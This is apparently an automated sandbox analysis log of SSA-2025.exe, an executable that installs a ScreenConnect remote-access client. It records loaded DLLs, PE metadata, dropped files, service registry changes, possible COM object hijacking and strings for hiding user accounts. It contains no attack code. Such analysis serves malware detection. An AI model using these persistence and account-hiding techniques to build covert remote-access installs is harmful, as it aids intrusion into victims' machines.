                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                        Source: C:\Users\user\Desktop\SSA-2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\SSA-2025.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: SSA-2025.exeStatic PE information: certificate valid
                        Source: SSA-2025.exeStatic file information: File size 5622768 > 1048576
                        Source: SSA-2025.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                        Source: SSA-2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: SSA-2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: SSA-2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: SSA-2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: SSA-2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: SSA-2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: SSA-2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: SSA-2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3434546614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284665209.0000000002352000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283881480.0000000000A10000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284864737.00000000024B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: SSA-2025.exe
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2215055403.0000000000EDD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: SSA-2025.exe
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: SSA-2025.exe
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: SSA-2025.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2185984964.0000000005141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2189534877.0000000004FD0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: SSA-2025.exe
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: SSA-2025.exe, MSI5CAE.tmp.3.dr, 515401.msi.3.dr, MSI56F0.tmp.3.dr, 515402.rbs.3.dr, 515403.msi.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2185984964.00000000050D2000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: SSA-2025.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3448893667.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2292424910.00000000124C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2232490570.0000000000FF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                        Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: SSA-2025.exe, 515401.msi.3.dr, 515403.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2232490570.0000000000FF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284375998.00000000022F2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284375998.00000000022F2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                        Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3448893667.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2292424910.00000000124C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3448893667.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2292424910.00000000124C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: SSA-2025.exe
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: SSA-2025.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                        Source: SSA-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: SSA-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: SSA-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: SSA-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: SSA-2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: ScreenConnect.Client.dll.3.drStatic PE information: 0x94F102E7 [Mon Mar 8 13:28:07 2049 UTC]
                        Source: SSA-2025.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x56874f
                        Source: MSI5068.tmp.2.drStatic PE information: real checksum: 0x2f213 should be: 0x1125d0
                        Source: ScreenConnect.WindowsAuthenticationPackage.dll.3.drStatic PE information: section name: _RDATA
                        Source: ScreenConnect.WindowsCredentialProvider.dll.3.drStatic PE information: section name: _RDATA

                        Persistence and Installation Behavior

                        barindex
                        Creates files in the system32 config directory
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                        Possible COM Object hijacking
                        Source: c:\program files (x86)\screenconnect client (b396bb1a05b88972)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-d1d8-a23813efb81a}\inprocserver32
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Client.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5CAE.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5068.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56F0.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5CAE.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56F0.tmpJump to dropped file
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (b396bb1a05b88972)Jump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Contains functionality to hide user accounts
                        Source: SSA-2025.exe, 00000000.00000000.2155300379.0000000000356000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: SSA-2025.exe, 00000000.00000002.2192468053.00000000052E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: rundll32.exe, 00000005.00000003.2185984964.000000000514D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3434546614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284665209.0000000002352000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283881480.0000000000A10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284864737.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2305741681.000000001B3E2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: SSA-2025.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
